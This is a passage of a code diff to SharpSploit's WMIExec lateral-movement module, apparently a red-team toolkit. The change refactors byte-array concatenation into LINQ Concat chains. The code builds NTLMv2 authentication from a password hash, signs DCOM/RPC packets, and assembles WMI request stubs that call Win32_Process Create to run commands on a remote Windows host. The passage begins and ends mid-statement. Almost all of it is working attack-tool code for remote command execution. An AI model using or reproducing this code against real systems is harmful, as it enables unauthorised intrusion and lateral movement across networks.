+                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
+
+                        server_challenge_and_security_blob_bytes = WMI_NTLM_challenge.Concat(security_blob_bytes).ToArray();
                         HMAC_MD5.Key = NTLMv2_hash;
                         NTLMv2_response = HMAC_MD5.ComputeHash(server_challenge_and_security_blob_bytes);
                         session_base_key = HMAC_MD5.ComputeHash(NTLMv2_response);
                         byte[] client_signing_constant = new byte[] { 0x73, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x74, 0x6f, 0x20, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x2d, 0x74, 0x6f, 0x2d, 0x73, 0x65, 0x72, 0x76, 0x65, 0x72, 0x20, 0x73, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x6d, 0x61, 0x67, 0x69, 0x63, 0x20, 0x63, 0x6f, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x74, 0x00 };
                         MD5CryptoServiceProvider MD5_crypto = new MD5CryptoServiceProvider();
-                        byte[] client_signing_key = MD5_crypto.ComputeHash(Utilities.CombineByteArray(session_base_key, client_signing_constant));
-                        NTLMv2_response = Utilities.CombineByteArray(NTLMv2_response, security_blob_bytes);
+                        byte[] client_signing_key = MD5_crypto.ComputeHash(session_base_key.Concat(client_signing_constant).ToArray());
+                        NTLMv2_response = NTLMv2_response.Concat(security_blob_bytes).ToArray();
                         NTLMv2_response_length = BitConverter.GetBytes(NTLMv2_response.Length);
                         NTLMv2_response_length = new byte[] { NTLMv2_response_length[0], NTLMv2_response_length[1] };
                         WMI_session_key_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + NTLMv2_response.Length + 88);
                         WMI_session_key_length = new byte[] { 0x00, 0x00 };
                         WMI_negotiate_flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
-                        NTLMSSP_response = null;
-                        NTLMSSP_response = Utilities.CombineByteArray(new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 }, auth_LM_offset);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_NTLM_offset);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_offset);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_offset);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_offset);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_length);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_offset);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_negotiate_flags);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_bytes);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_bytes);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_bytes);
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
-                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response);
+                        NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
+                            .Concat(auth_LM_offset)
+                            .Concat(NTLMv2_response_length)
+                            .Concat(NTLMv2_response_length)
+                            .Concat(auth_NTLM_offset)
+                            .Concat(auth_domain_length)
+                            .Concat(auth_domain_length)
+                            .Concat(auth_domain_offset)
+                            .Concat(auth_username_length)
+                            .Concat(auth_username_length)
+                            .Concat(auth_username_offset)
+                            .Concat(auth_hostname_length)
+                            .Concat(auth_hostname_length)
+                            .Concat(auth_hostname_offset)
+                            .Concat(WMI_session_key_length)
+                            .Concat(WMI_session_key_length)
+                            .Concat(WMI_session_key_offset)
+                            .Concat(WMI_negotiate_flags)
+                            .Concat(auth_domain_bytes)
+                            .Concat(auth_username_bytes)
+                            .Concat(auth_hostname_bytes)
+                            .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                            .Concat(NTLMv2_response).ToArray();
+
                         HMAC_MD5.Key = client_signing_key;
                         sequence_number = new byte[] { 0x00, 0x00, 0x00, 0x00 };
                         packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
@@ -522,15 +526,19 @@ namespace SharpSploit.LateralMovement
                         byte[] rem_query_interface = Utilities.ConvertFromPacketOrderedDictionary(packet_rem_query_interface);
                         byte[] NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
                         HMAC_MD5.Key = client_signing_key;
-                        byte[] RPC_Sign = Utilities.CombineByteArray(sequence_number, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
-                        RPC_Sign = Utilities.CombineByteArray(RPC_Sign, rem_query_interface);
-                        RPC_Sign = Utilities.CombineByteArray(RPC_Sign, Utilities.GetByteRange(NTLMSSP_verifier, 0, 11));
+                        byte[] RPC_Sign = sequence_number.Concat(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC))
+                            .Concat(rem_query_interface)
+                            .Concat(Utilities.GetByteRange(NTLMSSP_verifier, 0, 11)).ToArray();
+                        
                         byte[] RPC_signature = HMAC_MD5.ComputeHash(RPC_Sign);
                         RPC_signature = Utilities.GetByteRange(RPC_signature, 0, 7);
                         packet_NTLMSSP_verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_signature;
                         NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
-                        WMI_client_send = Utilities.CombineByteArray(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC), rem_query_interface);
-                        WMI_client_send = Utilities.CombineByteArray(WMI_client_send, NTLMSSP_verifier);
+
+                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC)
+                            .Concat(rem_query_interface)
+                            .Concat(NTLMSSP_verifier).ToArray();
+
                         WMI_client_receive = SendStream(WMI_client_random_port_stream, WMI_client_send);
                         WMI_client_stage = "exit";
 
@@ -633,21 +641,22 @@ namespace SharpSploit.LateralMovement
 
                                                     if (Convert.ToBoolean(auth_hostname.Length % 2))
                                                     {
-                                                        auth_hostname_bytes = Utilities.CombineByteArray(auth_hostname_bytes, new byte[] { 0x00, 0x00 });
+                                                        auth_hostname_bytes = auth_hostname_bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
                                                     }
                                                     else
                                                     {
-                                                        auth_hostname_bytes = Utilities.CombineByteArray(auth_hostname_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                        auth_hostname_bytes = auth_hostname_bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                     }
 
-                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 });
-                                                    stub_data = Utilities.CombineByteArray(stub_data, hostname_length);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00 });
-                                                    stub_data = Utilities.CombineByteArray(stub_data, hostname_length);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, auth_hostname_bytes);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, process_ID_Bytes);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(causality_ID_bytes)
+                                                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 })
+                                                        .Concat(hostname_length)
+                                                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(hostname_length)
+                                                        .Concat(auth_hostname_bytes)
+                                                        .Concat(process_ID_Bytes)
+                                                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                 }
                                                 break;
                                             case 1:
@@ -660,8 +669,9 @@ namespace SharpSploit.LateralMovement
                                                     request_opnum = new byte[] { 0x03, 0x00 };
                                                     request_UUID = IPID;
                                                     WMI_client_stage_next = "Request";
-                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(causality_ID_bytes)
+                                                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                 }
                                                 break;
                                             case 2:
@@ -679,20 +689,23 @@ namespace SharpSploit.LateralMovement
 
                                                     if (Convert.ToBoolean(target_short.Length % 2))
                                                     {
-                                                        WMI_namespace_unicode = Utilities.CombineByteArray(WMI_namespace_unicode, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                        WMI_namespace_unicode = WMI_namespace_unicode.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                     }
                                                     else
                                                     {
-                                                        WMI_namespace_unicode = Utilities.CombineByteArray(WMI_namespace_unicode, new byte[] { 0x00, 0x00 });
+                                                        WMI_namespace_unicode = WMI_namespace_unicode.Concat(new byte[] { 0x00, 0x0 }).ToArray();
+
                                                     }
 
-                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 });
-                                                    stub_data = Utilities.CombineByteArray(stub_data, WMI_namespace_length);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00 });
-                                                    stub_data = Utilities.CombineByteArray(stub_data, WMI_namespace_length);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, WMI_namespace_unicode);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x04, 0x00, 0x02, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x2d, 0x00, 0x55, 0x00, 0x53, 0x00, 0x2c, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(causality_ID_bytes)
+                                                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 })
+                                                        .Concat(WMI_namespace_length)
+                                                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(WMI_namespace_length)
+                                                        .Concat(WMI_namespace_unicode)
+                                                        .Concat(new byte[] { 0x04, 0x00, 0x02, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x2d, 0x00, 0x55, 0x00, 0x53, 0x00, 0x2c, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                   
                                                 }
                                                 break;
                                             case 3:
@@ -753,8 +766,10 @@ namespace SharpSploit.LateralMovement
                                                     request_opnum = new byte[] { 0x06, 0x00 };
                                                     request_UUID = IPID2;
                                                     WMI_client_stage_next = "Request";
-                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+
+                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(causality_ID_bytes)
+                                                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                 }
                                                 break;
                                             case 7:
@@ -767,8 +782,10 @@ namespace SharpSploit.LateralMovement
                                                     request_opnum = new byte[] { 0x06, 0x00 };
                                                     request_UUID = IPID2;
                                                     WMI_client_stage_next = "Request";
-                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
-                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+
+                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(causality_ID_bytes)
+                                                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                 }
                                                 break;
                                             default:
@@ -791,38 +808,41 @@ namespace SharpSploit.LateralMovement
                                                         string command_padding_check = Convert.ToString(Decimal.Divide(command.Length, 4));
                                                         if (command_padding_check.Contains(".75"))
                                                         {
-                                                            command_bytes = Utilities.CombineByteArray(command_bytes, new byte[] { 0x00 });
+                                                            command_bytes = command_bytes.Concat(new byte[] { 0x00 }).ToArray();
                                                         }
                                                         else if (command_padding_check.Contains(".5"))
                                                         {
-                                                            command_bytes = Utilities.CombineByteArray(command_bytes, new byte[] { 0x00, 0x00 });
+                                                            command_bytes = command_bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
                                                         }
                                                         else if (command_padding_check.Contains(".25"))
                                                         {
-                                                            command_bytes = Utilities.CombineByteArray(command_bytes, new byte[] { 0x00, 0x00, 0x00 });
+                                                            command_bytes = command_bytes.Concat(new byte[] { 0x00, 0x00, 0x00 }).ToArray();
                                                         }
                                                         else
                                                         {
-                                                            command_bytes = Utilities.CombineByteArray(command_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                            command_bytes = command_bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                         }
-                                                        stub_data = new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
-                                                        stub_data = Utilities.CombineByteArray(stub_data, causality_ID_bytes);
-                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x06, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x63, 0x00, 0x72, 0x00, 0x65, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 });
-                                                        stub_data = Utilities.CombineByteArray(stub_data, stub_length);
-                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00 });
-                                                        stub_data = Utilities.CombineByteArray(stub_data, stub_length);
-                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x04, 0x00, 0x00, 0x00, 0x81, 0xa6, 0x12, 0xdc, 0x7f, 0x73, 0xcf, 0x11, 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x12, 0xf8, 0x90, 0x45, 0x3a, 0x1d, 0xd0, 0x11, 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x00, 0x00, 0x00, 0x00 });
-                                                        stub_data = Utilities.CombineByteArray(stub_data, stub_length2);
-                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x78, 0x56, 0x34, 0x12 });
-                                                        stub_data = Utilities.CombineByteArray(stub_data, stub_length3);
-                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x02, 0x53, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x03, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x15, 0x01, 0x00, 0x00, 0x73, 0x01, 0x00, 0x00, 0x76, 0x02, 0x00, 0x00, 0xd4, 0x02, 0x00, 0x00, 0xb1, 0x03, 0x00, 0x00, 0x15, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x12, 0x04, 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00, 0x61, 0x62, 0x73, 0x74, 0x72, 0x61, 0x63, 0x74, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x59, 0x01, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0xe2, 0x01, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x72, 0x02, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 